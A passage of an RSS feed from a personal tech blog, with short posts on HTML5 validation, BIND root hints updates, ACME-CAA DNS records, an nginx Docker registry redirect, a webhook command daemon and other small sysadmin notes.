  2262.    <content:encoded><![CDATA[<p>After <a href="" title="Winter - plain 2">switching the colors</a> of the design, I kept the momentum and continued working on the HTML of the blog.</p>
  2263. <p>It took couple iterations of multiple hours, but now it's done: the HTML source of this blog is <a href="" title="Nu HTML Checker">valid HTML5</a>!</p>
  2264. <p>Getting rid of the obsoleteness hidden in old blogentries dating back over 20 years also led to some interesting observations.<br>
  2265. Back when moving from HTML 4.01 to <a href="" title="x-log v2.02c">XHTML 1.1</a>, I remember spending some time to transform old <code>&lt;br&gt;</code> tags to <code>&lt;br /&gt;</code>. And now for HTML5 I did the inverse and moved all <code>&lt;br /&gt;</code> tags back to <code>&lt;br&gt;</code> :-)</p>
  2266. <p>Also once more I'm very thankful for the work of the <a href="" title="Internet Archive">Internet Archive</a>, which helped to recover images hosted on servers long gone (like URLs which already at the end of 2002 were no longer valid!).</p>
  2267. <p>Overall a lot of replacing no longer existing HTML tags and attributes with CSS definitions.<br>And there is virtually no change to the visual representation of the blog (which was the goal), so we still have the table-based layout with pixel-sized fonts as originally drafted in 2002.<br>Moving this to actually leverage modern HTML5 mechanisms and making it also more mobile friendly are tasks left for some future cold winter evenings :-)</p>
  2268. <p><a href="" title="Valid W3C HTML5"><img src="" width="352" height="124" alt="W3C HTML5"></a></p>
  2269. ]]></content:encoded>
  2270.  </item>
  2272.  <item>
  2273.    <title>Winter - plain 2</title>
  2274.    <link></link>
  2275.    <guid isPermaLink="true"></guid>
  2276.    <dc:creator>Andreas Jaggi</dc:creator>
  2277.    <creativeCommons:license></creativeCommons:license>
  2278.    <pubDate>Mon, 01 Jan 2024 12:41:00 +0100</pubDate>
  2279.    <category domain="">Webdesign</category>
  2280.    <description><![CDATA[<p>Happy New Year! &mdash; Happy New Colors!</p>
  2281. <p>Winter is here (for a while already), time to change the colors of the blog.<br>
  2282. To keep it in the nostalgic theme (the previous design was a <a href="" title="x-log - Blogging like 2002">repurpose of the inital design from 2002</a>), I'm using the colors from the <a href="" title="x-log - Winter">'plain 2' winter layout</a> (also from 2002).</p>
  2283. <p>Enjoy!</p>
  2284. ]]></description>
  2285.    <content:encoded><![CDATA[<p>Happy New Year! &mdash; Happy New Colors!</p>
  2286. <p>Winter is here (for a while already), time to change the colors of the blog.<br>
  2287. To keep it in the nostalgic theme (the previous design was a <a href="" title="x-log - Blogging like 2002">repurpose of the inital design from 2002</a>), I'm using the colors from the <a href="" title="x-log - Winter">'plain 2' winter layout</a> (also from 2002).</p>
  2288. <p>Enjoy!</p>
  2289. ]]></content:encoded>
  2290.  </item>
  2292.  <item>
  2293.    <title>MECSA</title>
  2294.    <link></link>
  2295.    <guid isPermaLink="true"></guid>
  2296.    <dc:creator>Andreas Jaggi</dc:creator>
  2297.    <creativeCommons:license></creativeCommons:license>
  2298.    <pubDate>Sat, 30 Dec 2023 09:16:00 +0100</pubDate>
  2299.    <category domain="">Networking</category>
  2300.    <description><![CDATA[<p>A <a href="" title="True, MECSA is also interesting: | Hacker News">comment on Hacker News</a> pointed me to the <a href="" title="My Email Communications Security Assessment (MECSA)">MECSA tool</a> provided by the European Union.</p>
  2301. <p>MECSA stands for My Email Communications Security Assessment, and is a tool to assess the security of email communication between providers.</p>
  2302. <p>As I run my own email server, I was curious to find out how my setup is scoring. Here are the results, seems like I'm doing a good job :-)</p>
  2303. <p><a href="" title="MECSA score for, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages."><img src="" alt="MECSA score for, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages." height="61" width="650"></a></p>
  2304. <p><a href="" title="MECSA details for, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS."><img src="" alt="MECSA details for, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS." height="75" width="650"></a></p>
  2305. <p>Link to the full report for <a href="" title="Report id f856486ecaf94dce5e8022c0a97c63b3 for domain (28/12/2023)"></a></p>
  2306. ]]></description>
  2307.    <content:encoded><![CDATA[<p>A <a href="" title="True, MECSA is also interesting: | Hacker News">comment on Hacker News</a> pointed me to the <a href="" title="My Email Communications Security Assessment (MECSA)">MECSA tool</a> provided by the European Union.</p>
  2308. <p>MECSA stands for My Email Communications Security Assessment, and is a tool to assess the security of email communication between providers.</p>
  2309. <p>As I run my own email server, I was curious to find out how my setup is scoring. Here are the results, seems like I'm doing a good job :-)</p>
  2310. <p><a href="" title="MECSA score for, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages."><img src="" alt="MECSA score for, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages." height="61" width="650"></a></p>
  2311. <p><a href="" title="MECSA details for, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS."><img src="" alt="MECSA details for, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS." height="75" width="650"></a></p>
  2312. <p>Link to the full report for <a href="" title="Report id f856486ecaf94dce5e8022c0a97c63b3 for domain (28/12/2023)"></a></p>
  2313. ]]></content:encoded>
  2314.  </item>
  2316.  <item>
  2317.    <title>Fix named checkhints extra record in hints</title>
  2318.    <link></link>
  2319.    <guid isPermaLink="true"></guid>
  2320.    <dc:creator>Andreas Jaggi</dc:creator>
  2321.    <creativeCommons:license></creativeCommons:license>
  2322.    <pubDate>Wed, 27 Dec 2023 20:53:00 +0100</pubDate>
  2323.    <category domain="">Linux</category>
  2324.    <description><![CDATA[<p>Recently named on my Debian server started to emit the following messages:</p>
  2325. <pre>Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: ( missing from hints
  2326. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: ( extra record in hints
  2327. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: (2801:1b8:10::b) missing from hints
  2328. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: (2001:500:200::b) extra record in hints</pre>
  2329. <p>The reason for these warnings, is a <a href="" title="New addresses for">IP change of the B root-server</a>.</p>
  2330. <p>Debian is <a href="" title="Debian bug report #1054393">not ready yet</a> with updating their dns-root-data package.<br>To fix the mismatching IP definitions on a Debian system, the current root zone definitions can also be updated manually from Internic:</p>
  2331. <pre>curl -s &gt; /usr/share/dns/root.hints
  2332. curl -s &gt; /usr/share/dns/root.hints.sig</pre>
  2333. ]]></description>
  2334.    <content:encoded><![CDATA[<p>Recently named on my Debian server started to emit the following messages:</p>
  2335. <pre>Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: ( missing from hints
  2336. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: ( extra record in hints
  2337. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: (2801:1b8:10::b) missing from hints
  2338. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: (2001:500:200::b) extra record in hints</pre>
  2339. <p>The reason for these warnings, is a <a href="" title="New addresses for">IP change of the B root-server</a>.</p>
  2340. <p>Debian is <a href="" title="Debian bug report #1054393">not ready yet</a> with updating their dns-root-data package.<br>To fix the mismatching IP definitions on a Debian system, the current root zone definitions can also be updated manually from Internic:</p>
  2341. <pre>curl -s &gt; /usr/share/dns/root.hints
  2342. curl -s &gt; /usr/share/dns/root.hints.sig</pre>
  2343. ]]></content:encoded>
  2344.  </item>
  2346.  <item>
  2347.    <title>Wikipedia Donation</title>
  2348.    <link></link>
  2349.    <guid isPermaLink="true"></guid>
  2350.    <dc:creator>Andreas Jaggi</dc:creator>
  2351.    <creativeCommons:license></creativeCommons:license>
  2352.    <pubDate>Sun, 10 Dec 2023 22:24:00 +0100</pubDate>
  2353.    <category domain="">Misc</category>
  2354.    <description><![CDATA[<p>Seems that after donating to Wikipedia there is a redirect to <a href="" rel="noreferrer" title="Thank You - Wikimedia Foundation">this page</a>, which sets a cookie to no longer show the donation banners.</p>
  2355. ]]></description>
  2356.    <content:encoded><![CDATA[<p>Seems that after donating to Wikipedia there is a redirect to <a href="" rel="noreferrer" title="Thank You - Wikimedia Foundation">this page</a>, which sets a cookie to no longer show the donation banners.</p>
  2357. ]]></content:encoded>
  2358.  </item>
  2360.  <item>
  2361.    <title>Why Personal Blogging Still Rules</title>
  2362.    <link></link>
  2363.    <guid isPermaLink="true"></guid>
  2364.    <dc:creator>Andreas Jaggi</dc:creator>
  2365.    <creativeCommons:license></creativeCommons:license>
  2366.    <pubDate>Sun, 30 Apr 2023 14:42:00 +0200</pubDate>
  2367.    <category domain="">Misc</category>
  2368.    <description><![CDATA[<p>Resonating article from <a href="" title="Mike Grindle - Homepage">Mike Grindle</a> about personal blogging and how it fits into todays Internet: <a href="" title="Why Personal Blogging Still Rules -">Why Personal Blogging Still Rules</a></p>
  2369. <blockquote cite="">
  2370. <p>Before the social media craze or publishing platforms, and long before ‘content creator’ was a job title, blogs served as one of the primary forms of online expression and communication.</p>
  2371. </blockquote>
  2372. <blockquote cite="">
  2373. <p>Everything on your blog was made to look and feel the way you wanted. If it didn’t, you rolled your sleeves up and coded that stuff in like the webmaster you were. And if the masses didn’t like it, who cared? They had no obligations to you, and you had none to them.</p>
  2374. </blockquote>
  2375. <blockquote cite="">
  2376. <p>Hiding beneath the drivel that is Google’s search results, and all the trackers, cookies, ads and curated feeds that come with them, personal blogs and sites of all shapes and sizes are still there. They’re thriving even in a kind of interconnected web beneath the web.</p>
  2377. </blockquote>
  2378. <blockquote cite="">
  2379. <p>The blogs on this small or “indie” web come in many shapes and sizes. [&hellip;] But at their core, they all have one characteristic in common: they’re there because their owners wanted to carve out their space on the internet.</p>
  2380. </blockquote>
  2381. <blockquote cite="">
  2382. <p>Your blog doesn’t have to be big and fancy. It doesn’t have to outrank everyone on Google, make money or “convert leads” to be important. It can be something that exists for its own sake, as your place to express yourself in whatever manner you please.</p>
  2383. </blockquote>
  2384. <p>(<a href="" title="der Uninformat – »Why Personal Blogging Still Rules«">via</a>)</p>
  2385. ]]></description>
  2386.    <content:encoded><![CDATA[<p>Resonating article from <a href="" title="Mike Grindle - Homepage">Mike Grindle</a> about personal blogging and how it fits into todays Internet: <a href="" title="Why Personal Blogging Still Rules -">Why Personal Blogging Still Rules</a></p>
  2387. <blockquote cite="">
  2388. <p>Before the social media craze or publishing platforms, and long before ‘content creator’ was a job title, blogs served as one of the primary forms of online expression and communication.</p>
  2389. </blockquote>
  2390. <blockquote cite="">
  2391. <p>Everything on your blog was made to look and feel the way you wanted. If it didn’t, you rolled your sleeves up and coded that stuff in like the webmaster you were. And if the masses didn’t like it, who cared? They had no obligations to you, and you had none to them.</p>
  2392. </blockquote>
  2393. <blockquote cite="">
  2394. <p>Hiding beneath the drivel that is Google’s search results, and all the trackers, cookies, ads and curated feeds that come with them, personal blogs and sites of all shapes and sizes are still there. They’re thriving even in a kind of interconnected web beneath the web.</p>
  2395. </blockquote>
  2396. <blockquote cite="">
  2397. <p>The blogs on this small or “indie” web come in many shapes and sizes. [&hellip;] But at their core, they all have one characteristic in common: they’re there because their owners wanted to carve out their space on the internet.</p>
  2398. </blockquote>
  2399. <blockquote cite="">
  2400. <p>Your blog doesn’t have to be big and fancy. It doesn’t have to outrank everyone on Google, make money or “convert leads” to be important. It can be something that exists for its own sake, as your place to express yourself in whatever manner you please.</p>
  2401. </blockquote>
  2402. <p>(<a href="" title="der Uninformat – »Why Personal Blogging Still Rules«">via</a>)</p>
  2403. ]]></content:encoded>
  2404.  </item>
  2406.  <item>
  2407.    <title>exec-hookd</title>
  2408.    <link></link>
  2409.    <guid isPermaLink="true"></guid>
  2410.    <dc:creator>Andreas Jaggi</dc:creator>
  2411.    <creativeCommons:license></creativeCommons:license>
  2412.    <pubDate>Sun, 23 Apr 2023 22:32:00 +0200</pubDate>
  2413.    <category domain="">Linux</category>
  2414.    <description><![CDATA[<p>To automate some of the deployment steps on my personal server, I needed a tool which can be triggered by a webhook and does execute some pre-defined commands.</p>
  2415. <p>A classic solution for this would be to have a simple PHP script with a call to <code>system(...)</code>. But I don't have PHP installed on the server itself and wanted this to be more lightweight than a full Apache+PHP installation.</p>
  2416. <p>Thus <a href="" title="x-way/exec-hookd: execute commands from webhooks">exec-hookd</a> was born. It is a small Go daemon which listens to HTTP POST requests and runs pre-defined commands when a matching path is requested.</p>
  2417. <p>Its configuration lives in a small JSON file, which lists the port to listen on and the paths together with their commands to execute:</p>
  2418. <pre>{
  2419.  "Port": 8059,
  2420.  "HookList": [
  2421.    {
  2422.      "Path": "/myhook",
  2423.      "Exec": [
  2424.        {
  2425.          "Cmd": "/usr/bin/somecmd",
  2426.          "Args": [
  2427.            "--some",
  2428.            "arguments"
  2429.          ],
  2430.          "Timeout": "5s"
  2431.        }
  2432.      ]
  2433.    }
  2434.  ]
  2435. }</pre>
  2436. <p>The commands are called with a timeout after which they are stopped to avoid that things hang around forever.</p>
  2437. ]]></description>
  2438.    <content:encoded><![CDATA[<p>To automate some of the deployment steps on my personal server, I needed a tool which can be triggered by a webhook and does execute some pre-defined commands.</p>
  2439. <p>A classic solution for this would be to have a simple PHP script with a call to <code>system(...)</code>. But I don't have PHP installed on the server itself and wanted this to be more lightweight than a full Apache+PHP installation.</p>
  2440. <p>Thus <a href="" title="x-way/exec-hookd: execute commands from webhooks">exec-hookd</a> was born. It is a small Go daemon which listens to HTTP POST requests and runs pre-defined commands when a matching path is requested.</p>
  2441. <p>Its configuration lives in a small JSON file, which lists the port to listen on and the paths together with their commands to execute:</p>
  2442. <pre>{
  2443.  "Port": 8059,
  2444.  "HookList": [
  2445.    {
  2446.      "Path": "/myhook",
  2447.      "Exec": [
  2448.        {
  2449.          "Cmd": "/usr/bin/somecmd",
  2450.          "Args": [
  2451.            "--some",
  2452.            "arguments"
  2453.          ],
  2454.          "Timeout": "5s"
  2455.        }
  2456.      ]
  2457.    }
  2458.  ]
  2459. }</pre>
  2460. <p>The commands are called with a timeout after which they are stopped to avoid that things hang around forever.</p>
  2461. ]]></content:encoded>
  2462.  </item>
  2464.  <item>
  2465.    <title>Nice git log alias</title>
  2466.    <link></link>
  2467.    <guid isPermaLink="true"></guid>
  2468.    <dc:creator>Andreas Jaggi</dc:creator>
  2469.    <creativeCommons:license></creativeCommons:license>
  2470.    <pubDate>Sun, 16 Apr 2023 13:55:00 +0200</pubDate>
  2471.    <category domain="">Coding</category>
  2472.    <description><![CDATA[<p><a href="" title="Wald- und Wiesen-Weblog -">Ralf</a> <a href="" title="ralf g.: killer-alias für das schönste gitlog in der shell">tooted</a> a nice and tidy git log output alias for the console:</p>
  2473. <code>
  2474. alias glg="git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)&lt;%an&gt;%Creset' --abbrev-commit"
  2475. </code>
  2476. ]]></description>
  2477.    <content:encoded><![CDATA[<p><a href="" title="Wald- und Wiesen-Weblog -">Ralf</a> <a href="" title="ralf g.: killer-alias für das schönste gitlog in der shell">tooted</a> a nice and tidy git log output alias for the console:</p>
  2478. <code>
  2479. alias glg="git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)&lt;%an&gt;%Creset' --abbrev-commit"
  2480. </code>
  2481. ]]></content:encoded>
  2482.  </item>
  2484.  <item>
  2485.    <title>Docker registry facade with nginx</title>
  2486.    <link></link>
  2487.    <guid isPermaLink="true"></guid>
  2488.    <dc:creator>Andreas Jaggi</dc:creator>
  2489.    <creativeCommons:license></creativeCommons:license>
  2490.    <pubDate>Sat, 18 Mar 2023 10:36:00 +0100</pubDate>
  2491.    <category domain="">Linux</category>
  2492.    <description><![CDATA[<p>Found <a href="" title="Dodge the next Dockerpocalypse: how to own your own Docker Registry address">this inspiring blog post</a> about how to use your own domain for Docker images. (via <a href="" title="How to own your own Docker Registry address | Hacker News">HN</a>)</p>
  2493. <p>It explains how to use your own domain with redirects such that the Docker registry hosting the images can be changed easily. Your domain is only used for issueing HTTP redirects, so that the actual data storage and transfer happens directly with the Docker registry.</p>
  2494. <p>The blog post comes with <a href="" title="Caddyfile">a sample implementation for Caddy</a>. As my server is running <a href="" title="nginx">nginx</a>, I used the following config snippet to achieve the same result:</p>
  2495. <pre>
  2496. server {
  2497. listen 443 ssl;
  2498. listen [::]:443 ssl;
  2500. server_name;
  2502. access_log /var/log/nginx/;
  2503. error_log /var/log/nginx/;
  2505. ssl_certificate /etc/letsencrypt/live/;
  2506. ssl_certificate_key /etc/letsencrypt/live/;
  2508. location / {
  2509. return 403;
  2510. }
  2512. location = /v2 {
  2513. add_header Cache-Control 'max-age=300, must-revalidate';
  2514. return 307$request_uri;
  2515. }
  2516. location = /v2/ {
  2517. add_header Cache-Control 'max-age=300, must-revalidate';
  2518. return 307$request_uri;
  2519. }
  2520. location = /v2/xway {
  2521. add_header Cache-Control 'max-age=300, must-revalidate';
  2522. return 307$request_uri;
  2523. }
  2524. location /v2/xway/ {
  2525. add_header Cache-Control 'max-age=300, must-revalidate';
  2526. return 307$request_uri;
  2527. }
  2528. }
  2529. </pre>
  2530. <p>Quickly tested it with some docker pull commands and already integrated it into the <a href="" title="Use custom registry by x-way - Pull Request #72 - x-way/dnsupd">build process of dnsupd</a>.</p>
  2531. ]]></description>
  2532.    <content:encoded><![CDATA[<p>Found <a href="" title="Dodge the next Dockerpocalypse: how to own your own Docker Registry address">this inspiring blog post</a> about how to use your own domain for Docker images. (via <a href="" title="How to own your own Docker Registry address | Hacker News">HN</a>)</p>
  2533. <p>It explains how to use your own domain with redirects such that the Docker registry hosting the images can be changed easily. Your domain is only used for issueing HTTP redirects, so that the actual data storage and transfer happens directly with the Docker registry.</p>
  2534. <p>The blog post comes with <a href="" title="Caddyfile">a sample implementation for Caddy</a>. As my server is running <a href="" title="nginx">nginx</a>, I used the following config snippet to achieve the same result:</p>
  2535. <pre>
  2536. server {
  2537. listen 443 ssl;
  2538. listen [::]:443 ssl;
  2540. server_name;
  2542. access_log /var/log/nginx/;
  2543. error_log /var/log/nginx/;
  2545. ssl_certificate /etc/letsencrypt/live/;
  2546. ssl_certificate_key /etc/letsencrypt/live/;
  2548. location / {
  2549. return 403;
  2550. }
  2552. location = /v2 {
  2553. add_header Cache-Control 'max-age=300, must-revalidate';
  2554. return 307$request_uri;
  2555. }
  2556. location = /v2/ {
  2557. add_header Cache-Control 'max-age=300, must-revalidate';
  2558. return 307$request_uri;
  2559. }
  2560. location = /v2/xway {
  2561. add_header Cache-Control 'max-age=300, must-revalidate';
  2562. return 307$request_uri;
  2563. }
  2564. location /v2/xway/ {
  2565. add_header Cache-Control 'max-age=300, must-revalidate';
  2566. return 307$request_uri;
  2567. }
  2568. }
  2569. </pre>
  2570. <p>Quickly tested it with some docker pull commands and already integrated it into the <a href="" title="Use custom registry by x-way - Pull Request #72 - x-way/dnsupd">build process of dnsupd</a>.</p>
  2571. ]]></content:encoded>
  2572.  </item>
  2574.  <item>
  2575.    <title>STRAYA 🇦🇺</title>
  2576.    <link></link>
  2577.    <guid isPermaLink="true"></guid>
  2578.    <dc:creator>Andreas Jaggi</dc:creator>
  2579.    <creativeCommons:license></creativeCommons:license>
  2580.    <pubDate>Thu, 26 Jan 2023 05:43:00 +0100</pubDate>
  2581.    <category domain="">Music</category>
  2582.    <description><![CDATA[<p>Here's a bit older mashup. Happy <a href="" title="Australia Day 2023 - Australia Day in NSW">Australia Day</a>!</p>
  2583. <p><a href="" title="National Anthem of STRAYA - YouTube">National Anthem of STRAYA</a></p>
  2584. ]]></description>
  2585.    <content:encoded><![CDATA[<p>Here's a bit older mashup. Happy <a href="" title="Australia Day 2023 - Australia Day in NSW">Australia Day</a>!</p>
  2586. <p><a href="" title="National Anthem of STRAYA - YouTube">National Anthem of STRAYA</a></p>
  2587. ]]></content:encoded>
  2588.  </item>
  2590.  <item>
  2591.    <title>ACME-CAA</title>
  2592.    <link></link>
  2593.    <guid isPermaLink="true"></guid>
  2594.    <dc:creator>Andreas Jaggi</dc:creator>
  2595.    <creativeCommons:license></creativeCommons:license>
  2596.    <pubDate>Wed, 18 Jan 2023 23:06:00 +0100</pubDate>
  2597.    <category domain="">Networking</category>
  2598.    <description><![CDATA[<p>Let's Encrypt recently <a href="" title="Enabling ACME CAA Account and Method Binding">introduced support</a> for <a href="" title="RFC8657">ACME-CAA</a>.</p>
  2599. <p>I've now extended my existing CAA DNS entries with the ACME-CAA properties:</p>
  2600. <pre>% dig +short -t CAA
  2601. 0 issue "; accounturi=; validationmethods=http-01"
  2602. 0 issue "; accounturi=; validationmethods=http-01"</pre>
  2603. <p>The effect of this is that Let's Encrypt will only grant a signed TLS certificate if the request comes from one of my two accounts (authenticated with the corresponding private key).<br>If the certificate request comes from a different account, no TLS certificate will be granted.<br>This protects against man-in-the-middle attacks, specifically against attacks where someone between Let's Encrypt and my server would be trying to impersonate my server to obtain a signed TLS certificate.</p>
  2604. <p>Addendum:<br>In case you're wondering where to get the accounturi value from, it can be found in your account file:</p>
  2605. <pre>% cat /etc/letsencrypt/accounts/*/regr.json
  2606. {"body": {}, "uri": ""}</pre>
  2607. ]]></description>
  2608.    <content:encoded><![CDATA[<p>Let's Encrypt recently <a href="" title="Enabling ACME CAA Account and Method Binding">introduced support</a> for <a href="" title="RFC8657">ACME-CAA</a>.</p>
  2609. <p>I've now extended my existing CAA DNS entries with the ACME-CAA properties:</p>
  2610. <pre>% dig +short -t CAA
  2611. 0 issue "; accounturi=; validationmethods=http-01"
  2612. 0 issue "; accounturi=; validationmethods=http-01"</pre>
  2613. <p>The effect of this is that Let's Encrypt will only grant a signed TLS certificate if the request comes from one of my two accounts (authenticated with the corresponding private key).<br>If the certificate request comes from a different account, no TLS certificate will be granted.<br>This protects against man-in-the-middle attacks, specifically against attacks where someone between Let's Encrypt and my server would be trying to impersonate my server to obtain a signed TLS certificate.</p>
  2614. <p>Addendum:<br>In case you're wondering where to get the accounturi value from, it can be found in your account file:</p>
  2615. <pre>% cat /etc/letsencrypt/accounts/*/regr.json
  2616. {"body": {}, "uri": ""}</pre>
  2617. ]]></content:encoded>
  2618.  </item>
  2620.  <item>
  2621.    <title>JSON Feed</title>
  2622.    <link></link>
  2623.    <guid isPermaLink="true"></guid>
  2624.    <dc:creator>Andreas Jaggi</dc:creator>
  2625.    <creativeCommons:license></creativeCommons:license>
  2626.    <pubDate>Tue, 10 Jan 2023 21:51:00 +0100</pubDate>
  2627.    <category domain="">Webdesign</category>
  2628.    <description><![CDATA[<p>Added a <a href="" title="JSON Feed - Wikipedia">JSON Feed</a> to this blog (in additon to the existing <a href="" title="x-log - RSS feed">RSS</a> and <a href="" title="x-log - Atom feed">Atom</a> feeds): <a href="" title="x-log - JSON feed"></a></p>
  2629. <p>To build the proper JSON file, I used <a href="" title="JSON Feed for Jekyll">this Jekyll template</a> and the <a href="" title="JSON Feed Validator">JSON Feed validator</a>.</p>
  2630. ]]></description>
  2631.    <content:encoded><![CDATA[<p>Added a <a href="" title="JSON Feed - Wikipedia">JSON Feed</a> to this blog (in additon to the existing <a href="" title="x-log - RSS feed">RSS</a> and <a href="" title="x-log - Atom feed">Atom</a> feeds): <a href="" title="x-log - JSON feed"></a></p>
  2632. <p>To build the proper JSON file, I used <a href="" title="JSON Feed for Jekyll">this Jekyll template</a> and the <a href="" title="JSON Feed Validator">JSON Feed validator</a>.</p>
  2633. ]]></content:encoded>
  2634.  </item>
  2636.  <item>
  2637.    <title>Get last 24h of logs with AWK</title>
  2638.    <link></link>
  2639.    <guid isPermaLink="true"></guid>
  2640.    <dc:creator>Andreas Jaggi</dc:creator>
  2641.    <creativeCommons:license></creativeCommons:license>
  2642.    <pubDate>Tue, 03 Jan 2023 14:40:00 +0100</pubDate>
  2643.    <category domain="">Linux</category>
  2644.    <description><![CDATA[<p>For a temporary log analysis task, I wanted to get the last 24h of logs from a <a href="" title="The Postfix Home Page">Postfix</a> logfile.<br>To achieve this I came up with the following AWK oneliner (which fails in spectacular ways around new years):</p>
  2645. <code>
  2646. awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()'
  2647. </code>
  2648. <p>This is then used in a cronjob to get a <a href="" title="JIMSUN - Postfix Contribs">pflogsumm</a> summary of the last 24h:</p>
  2649. <code>
  2650. cat /var/log/mail.log | awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()' | pflogsumm
  2651. </code>
  2652. ]]></description>
  2653.    <content:encoded><![CDATA[<p>For a temporary log analysis task, I wanted to get the last 24h of logs from a <a href="" title="The Postfix Home Page">Postfix</a> logfile.<br>To achieve this I came up with the following AWK oneliner (which fails in spectacular ways around new years):</p>
  2654. <code>
  2655. awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()'
  2656. </code>
  2657. <p>This is then used in a cronjob to get a <a href="" title="JIMSUN - Postfix Contribs">pflogsumm</a> summary of the last 24h:</p>
  2658. <code>
  2659. cat /var/log/mail.log | awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()' | pflogsumm
  2660. </code>
  2661. ]]></content:encoded>
  2662.  </item>
  2664.  <item>
  2665.    <title>Happy New Year 2023</title>
  2666.    <link></link>
  2667.    <guid isPermaLink="true"></guid>
  2668.    <dc:creator>Andreas Jaggi</dc:creator>
  2669.    <creativeCommons:license></creativeCommons:license>
  2670.    <pubDate>Sat, 31 Dec 2022 13:59:00 +0100</pubDate>
  2671.    <category domain="">Misc</category>
  2672.    <description><![CDATA[<p><a href="" title="Sydney New Year's Eve midgnight fireworks - YouTube">Sydney New Year's Eve midgnight fireworks</a></p>
  2673. <p>As usual, Sydney is a bit ahead of us. Great memories, long time ago :-)</p>
  2674. ]]></description>
  2675.    <content:encoded><![CDATA[<p><a href="" title="Sydney New Year's Eve midgnight fireworks - YouTube">Sydney New Year's Eve midgnight fireworks</a></p>
  2676. <p>As usual, Sydney is a bit ahead of us. Great memories, long time ago :-)</p>
  2677. ]]></content:encoded>
  2678.  </item>
  2680.  <item>
  2681.    <title>Alpha Bravo Charlie</title>
  2682.    <link></link>
  2683.    <guid isPermaLink="true"></guid>
  2684.    <dc:creator>Andreas Jaggi</dc:creator>
  2685.    <creativeCommons:license></creativeCommons:license>
  2686.    <pubDate>Sun, 25 Dec 2022 22:11:00 +0100</pubDate>
  2687.    <category domain="">Misc</category>
  2688.    <description><![CDATA[<p>While closing an old account I had to communicate using the infamous NATO/ICAO phonetic alphabet (US banks like to exchange the 20+ character long <a href="" title="International Bank Account Number - Wikipedia">IBANs</a> via poor-quality call-center phonelines).</p>
  2689. <p>As it has been a while since I last used it, I created a handy table to quickly lookup the code words: <a href="" title="NATO/ICAO phonetic alphabet"></a></p>
  2690. <p>Special feature: when queried by curl (eg. without a text/html Accept header) it returns the table as plaintext :-)</p>
  2691. <pre># curl
  2692. A Alpha      S Sierra
  2693. B Bravo      T Tango
  2694. C Charlie    U Uniform
  2695. D Delta      V Victor
  2696. E Echo       W Whiskey
  2697. F Foxtrot    X X-ray
  2698. G Golf       Y Yankee
  2699. H Hotel      Z Zulu
  2700. I India      0 Zero
  2701. J Juliett    1 One
  2702. K Kilo       2 Two
  2703. L Lima       3 Three
  2704. M Mike       4 Four
  2705. N November   5 Five
  2706. O Oscar      6 Six
  2707. P Papa       7 Seven
  2708. Q Quebec     8 Eight
  2709. R Romeo      9 Niner</pre>
  2710. ]]></description>
  2711.    <content:encoded><![CDATA[<p>While closing an old account I had to communicate using the infamous NATO/ICAO phonetic alphabet (US banks like to exchange the 20+ character long <a href="" title="International Bank Account Number - Wikipedia">IBANs</a> via poor-quality call-center phonelines).</p>
  2712. <p>As it has been a while since I last used it, I created a handy table to quickly lookup the code words: <a href="" title="NATO/ICAO phonetic alphabet"></a></p>
  2713. <p>Special feature: when queried by curl (eg. without a text/html Accept header) it returns the table as plaintext :-)</p>
  2714. <pre># curl
  2715. A Alpha      S Sierra
  2716. B Bravo      T Tango
  2717. C Charlie    U Uniform
  2718. D Delta      V Victor
  2719. E Echo       W Whiskey
  2720. F Foxtrot    X X-ray
  2721. G Golf       Y Yankee
  2722. H Hotel      Z Zulu
  2723. I India      0 Zero
  2724. J Juliett    1 One
  2725. K Kilo       2 Two
  2726. L Lima       3 Three
  2727. M Mike       4 Four
  2728. N November   5 Five
  2729. O Oscar      6 Six
  2730. P Papa       7 Seven
  2731. Q Quebec     8 Eight
  2732. R Romeo      9 Niner</pre>
  2733. ]]></content:encoded>
  2734.  </item>
  2736.  <item>
  2737.    <title>How to Exit Vim</title>
  2738.    <link></link>
  2739.    <guid isPermaLink="true"></guid>
  2740.    <dc:creator>Andreas Jaggi</dc:creator>
  2741.    <creativeCommons:license></creativeCommons:license>
